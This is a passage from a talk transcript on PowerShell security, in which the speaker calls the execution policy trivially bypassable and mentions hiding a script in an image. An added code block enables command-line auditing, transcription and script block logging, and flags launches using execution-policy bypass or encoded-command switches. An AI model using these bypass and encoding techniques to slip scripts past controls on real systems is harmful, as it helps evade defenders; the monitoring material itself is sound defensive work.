using would that be a successful way of you know keeping it low-key you could hide it in an image uh I do not have a strong background in stego um theoretically yeah you probably just made your script a lot longer but um I don't see a reason why you wouldn't be able to anybody else yes

yes um so the execution policy it's a it's a good thing um Microsoft is very careful to call that a uh safety feature not a security feature so the difference would be um your seat belt is a safety feature it will not stop you from running your car into a tree um the execution policy is a good catch but there's so many ways to bypass that that I mean it's it's ridiculous there's web pages called 15 ways to bypass the script execution policy in PowerShell it's pretty much child's play to step around

it just in case set oh yeah if I was going to deploy it whatever actually started up the script I would run that with a bypass to get past the execution policy yep all right I'm I am just about out of time um
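The defensive settings the speaker runs through (command line in the process-creation event, mandatory PowerShell transcription, PowerShell logging) as an added configuration example with a check on top, not the speaker's GitHub code; it assumes an elevated Windows PowerShell 5.x session, and the transcript directory C:\PSTranscripts is a constructed placeholder.

```powershell
# Added example (not the speaker's code). Assumes an elevated Windows PowerShell 5.x session.

# 1. Audit process creation and put the command line into event 4688
#    (the hotfix behaviour the talk mentions; the registry value is the documented switch).
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable | Out-Null
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
New-Item -Path $auditKey -Force | Out-Null
Set-ItemProperty -Path $auditKey -Name ProcessCreationIncludeCmdLine_Enabled -Value 1 -Type DWord

# 2. Mandatory transcription: every PowerShell session writes its input and output
#    to the directory below without prompting the user (policy read by PowerShell 5.0+).
$psPolicy      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$transcriptDir = 'C:\PSTranscripts'   # constructed placeholder; use a protected, write-only share in practice
New-Item -Path "$psPolicy\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$psPolicy\Transcription" -Name EnableTranscripting    -Value 1 -Type DWord
Set-ItemProperty -Path "$psPolicy\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$psPolicy\Transcription" -Name OutputDirectory        -Value $transcriptDir -Type String

# 3. Script block logging: script contents land in Microsoft-Windows-PowerShell/Operational as event 4104.
New-Item -Path "$psPolicy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$psPolicy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 4. Check: list recent PowerShell launches from the Security log and flag the
#    execution-policy bypass the speaker says he would use to start the monitoring script.
function Get-PowerShellLaunch {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        Where-Object { $_.Message -match 'powershell(_ise)?\.exe' } |
        ForEach-Object {
            # The command line is only present once step 1 is in effect.
            $cmdLine = ($_.Message -split "`r?`n" |
                        Where-Object { $_ -match '^\s*Process Command Line:' }) -replace '^\s*Process Command Line:\s*', ''
            [pscustomobject]@{
                Time        = $_.TimeCreated
                CommandLine = $cmdLine
                Bypass      = [bool]($cmdLine -match '-(ExecutionPolicy|ep)\s+Bypass|-EncodedCommand|-enc\b')
            }
        }
}

Get-PowerShellLaunch | Where-Object Bypass | Format-Table -AutoSize
```

The transcription and script block logging policies take effect for new PowerShell sessions; the 4688 command line appears for processes created after the audit value is set.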